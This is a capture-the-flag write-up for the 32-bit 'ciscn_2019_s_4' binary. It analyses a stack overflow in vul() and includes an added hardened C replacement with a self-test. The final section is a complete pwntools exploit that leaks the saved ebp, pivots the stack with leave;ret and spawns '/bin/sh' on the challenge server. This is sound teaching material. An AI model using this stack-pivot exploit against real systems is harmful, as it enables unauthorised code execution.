
ciscn_2019_s_4

Ubuntu 18


0x01


checksec

[*] '/home/zelas/Desktop/pwn/ciscn_2019_s_4/ciscn_s_4'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

IDA

vul()

int vul()
{
char s[40]; // [esp+0h] [ebp-28h] BYREF

memset(s, 0, 0x20u);
read(0, s, 0x30u);
printf("Hello, %s\n", s);
read(0, s, 0x30u);
return printf("Hello, %s\n", s);
}

Suspicious function hack()

int hack()
{
return system("echo flag");
}
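The root cause in vul() is a read() of 0x30 bytes into a 40-byte buffer plus a printf("%s") on data that is not guaranteed to be NUL-terminated. The following is an added example, not part of the original writeup or the challenge binary: a hardened counterpart of vul() that reads at most cap-1 bytes and always terminates the string, together with a self-contained check (a constructed 0x30-byte input fed through a pipe) showing that the excess bytes never reach the saved frame. The function names read_name and demo_overlong_input are my own.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Same buffer size as the decompiled vul(): char s[40]. */
#define NAME_CAP 40

/*
 * Hardened replacement for the read()/printf() pair in vul() (hypothetical
 * name, not from the binary). At most cap-1 bytes are read, so the saved ebp
 * and return address above the buffer can never be written, and the result
 * is always NUL-terminated, so printf("%s") stops inside the buffer instead
 * of walking into the saved frame pointer. Returns bytes kept, or -1 on error.
 */
ssize_t read_name(int fd, char *dst, size_t cap)
{
    if (cap == 0)
        return -1;
    memset(dst, 0, cap);
    ssize_t n = read(fd, dst, cap - 1);
    if (n < 0)
        return -1;
    dst[n] = '\0';
    return n;
}

/*
 * Constructed check: push a 0x30-byte name (the size the original read()
 * accepts) through a pipe and report how many bytes survived. A result of
 * NAME_CAP-1 (39) means the overflow bytes were dropped and the string is
 * terminated inside the buffer; -1 signals a failure of the invariant.
 */
ssize_t demo_overlong_input(void)
{
    int fds[2];
    char s[NAME_CAP];
    char input[0x30];

    memset(input, 'A', sizeof input);
    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input)
        return -1;
    close(fds[1]);

    ssize_t kept = read_name(fds[0], s, sizeof s);
    close(fds[0]);

    if (kept < 0 || s[kept] != '\0' || strlen(s) != (size_t)kept)
        return -1;
    return kept;
}

int main(void)
{
    char s[NAME_CAP];
    ssize_t n = read_name(STDIN_FILENO, s, sizeof s);
    if (n < 0)
        return 1;
    printf("Hello, %s\n", s);
    printf("kept %zd of at most %d bytes\n", n, NAME_CAP - 1);
    return 0;
}
```

With the bound tied to sizeof s rather than a literal, the two reasons the challenge is solvable (8 bytes of overflow and the missing terminator that leaks the saved ebp) both disappear; a stack canary or PIE would add defence in depth but would not be needed to close this particular bug.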

0x02


Approach

s sits at ebp-0x28 and read() accepts 0x30 bytes, so 0x30 - 0x28 - 4 = 4 bytes remain past the saved ebp: only enough to overwrite the return address, with no room for a function argument.

$ ROPgadget --binary ciscn_s_4 --only "leave|ret"
Gadgets information
============================================================
0x080484b8 : leave ; ret
0x080483a6 : ret
0x080484ce : ret 0xeac1

Unique gadgets found: 3

Use the overflow in the first read() to leak a stack address: filling all 0x28 bytes of s leaves no NUL terminator, so the following printf("%s") prints on into the saved ebp.

Compute the offset between the leaked ebp and buf; dynamic debugging in gdb gives 0x38.

Lay out the stack and send /bin/sh.

0x03

from pwn import *

context(os='linux', arch='i386', log_level='debug')
path = './ciscn_s_4'
io = remote('node4.buuoj.cn', 28684)
# io = process([path])
# libc =
# elf = ELF(path)

# First read: fill all 0x28 bytes of s with no NUL terminator, so the
# following printf("%s") keeps printing into the saved ebp and leaks it.
payload = flat(b'a' * 0x24, b'b' * 4)
io.sendafter(b'name?', payload)
stack = u32(io.recvuntil(b'\xff')[-4:])
print('[+] stack_address -->', hex(stack))
system = 0x8048400
leave_ret = 0x080484b8  # leave ; ret
buf = stack - 0x38  # offset from the leaked ebp to s, found in gdb
# Second read: fake frame inside s, then overwrite the saved ebp with buf-4
# and the return address with leave;ret to pivot esp into the buffer.
payload1 = flat(system, b'a' * 4, buf + 12, b'/bin/sh\x00', b'a' * 20, buf - 0x4, leave_ret)
io.sendline(payload1)
io.interactive()

